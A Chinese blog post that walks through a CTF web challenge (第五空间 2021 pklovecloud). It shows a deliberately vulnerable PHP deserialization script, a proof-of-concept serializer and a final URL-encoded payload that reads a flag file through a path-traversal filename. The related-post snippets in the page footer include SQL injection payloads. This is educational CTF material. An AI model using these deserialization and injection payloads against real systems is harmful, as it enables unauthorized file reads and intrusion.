[第五空间 2021]pklovecloud

最新推荐文章于 2024-07-17 16:42:25 发布
最新推荐文章于 2024-07-17 16:42:25 发布
阅读量228 收藏
点赞数
分类专栏: ctf web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/131561824
版权
ctf 同时被 2 个专栏收录
22 篇文章 0 订阅
订阅专栏
web
21 篇文章 0 订阅
订阅专栏 
<?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

很长的php代码,先进行分析

首先看到包含了flag.php,说明flag可能在这个文件下,接下来观察是否有能读取flag.php文件的函数

可以看到有一个file_gett_contents()

file_get_contents()是一个PHP函数,用于读取文件中的内容并将其作为字符串返回。它接受一个参数,即要读取的文件的路径。 

 而要利用到该函数就要大体上看如何构造pop链,可以看到是在rce类中的echo_name方法中,而唯一能调用这个方法的只有rcp类中的Tostring方法中,该方法只要所在类被当成字符串处理就会触发

观察能处理字符串的只有echo

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

所以只要pks是实例化后的rcp类就可以触发_tostring,但是在此之前也就是tostring之上有一个__construct方法,该方法只要进行了反序列化就会触发,且这个触发要先于tostring

在这个方法内部是对cinder属性的实例化赋值,恰恰这个属性又刚好是tostring方法内要调用echo_name的判断条件,此外pkshow类中也有一个echo_name这个不是我们想要调用的

include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}

而且可以看到cinder属性是受保护属性,只能靠赋值修改,所以这里我们将pkshow改成我们要的rce 

这样就可以满足调用又可以触发tostring了

 protected:受保护的属性只能在类的内部和继承类中访问。

再看到rce中利用函数的前提条件

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}

if($this->openstack->neutron === $this->openstack->nova)

 同一个类中的两个属性进行强比较,neutron有了赋值且赋值是$heat(整体没有出现)而nova又没有,这种情况下看着是无法相等的,但是这样可以利用null来进行比较,换句话说只要dokcer的类是null,哪无论怎么赋值结果都是null

这样我们就成功的绕过的比较利用到了file_get_contents()函数

POC:

<?php
class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new ace;
    }  
}  
class ace
{    
    public $filename='flag.php';
    public $openstack;
    public $docker;
}
$a=new acp();
$b=new ace();
$b->docker=null;
echo urlencode(serialize($a));
?>

 上传后可以看到

flag在/nssctfasdasdflag

 修改读取再传

 发现又不在这个目录下,于是尝试着回到上一个目录../nssctfasdasdflag

最终payload:

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A19%3A%22..%2Fnssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

 

 

总结

1.利用null,无论如何赋值都是null从而绕过强比较

2.遇到受保护属性可以通过修改方法中的赋值来修改私有属性(很疑惑序列化后方法不是没了吗)

参考学习:

文章列表 | NSSCTF 

Sharpery
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[第五空间 2021]pklovecloud 解题思路&过程
iamblackcat's blog
08-06 561
[第五空间 2021]pklovecloud 解题思路&过程
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3306
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
PHP反序列化&POP链的构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2699
网上关与PHP反序列化&POP链构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
[第五空间 2021]pklovecloud题解
qq_64222098的博客
05-07 187
在acp这个类里面,我们看到了_toString魔法方法,这个方法是当我们把一个对象当作函数调用时会被自动调用。并且_toString方法里还调用了echo_name()这个函数,这个函数恰巧就是我们先前找到的最终获得flag的地方。首先变量heat也是没有被赋值的,如果这时我们让变量nova的值也为空的话不久可以了嘛。这里我们就找到了这个链的终点,即我们可以通过这个file_get_contents函数来获得flag。知道了flag的位置了只需要把变量filename的值变一下就成功获得flag了。
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021年于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 665
NSSCTF[第五空间 2021]pklovecloud
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 609
[第五空间 2021] wp
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5613
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 757
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2021 第五空间 ctf wp
qq_45603443的博客
09-23 2983
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4900
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
2021第五空间网络安全大赛
Huamang的博客
09-17 1174
WebFTP https://github.com/wifeat/WebFTP 根据github的源码,去对网站进行分析,有写到初始账号 但是题目改了密码,登不进 然后下载到题目的Config.php.bak,看到版本是v2.3 出现了git泄漏,无法下载到文件,但是看到了目录结构 找到探针 http://114.115.185.167:32770/Readme/mytz.php http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo 直接找到f
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 103
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 83
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 432
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1021
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
阿里云短信PHP集成api类
最新发布
༺墨༒眉༻
07-17 85
无需安装sdk扩展包,直接引入类即可使用。
NSSCTF中24网安培训day1中web的题目
2302_78903258的博客
07-14 1056
我又试了大小写,双写,特殊后缀名绕过的方法,发现均不能绕过,我们用.htaccess文件进行绕过,先上传一个.htaccess文件,文件内容<FilesMatch ¡°.jpg¡±>SetHandler application/x-httpd-php</FilesMatch> //这是把php文件都当作jpg的图片格式。,也就是说它执行了下面这句,那么我们还需要传flag参数。giveme=flag&flag=giveme,输入后,发现如下直接返回了flag,也就是说,代码退出了并输出了flag。
php 实现栈
huanghm88的专栏
07-16 265
可以根据需要使用这些方法来操作栈。类,其中包含了入栈()和判断栈是否为空(

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值